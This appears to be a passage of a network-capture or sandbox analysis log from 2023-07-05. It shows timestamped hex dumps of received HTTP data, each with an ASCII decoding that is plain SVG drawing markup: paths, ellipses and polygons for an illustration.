                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13228INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13244INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13260INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                                                                                                                          Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13276INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13292INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13308INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                          Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13324INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13340INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13356INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                          Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13372INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13388INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13404INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13420INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                                                                                                                          Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13436INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13452INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                                                                                                                          Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13468INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                                                                                                                          Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13484INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                                                                                                                          Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
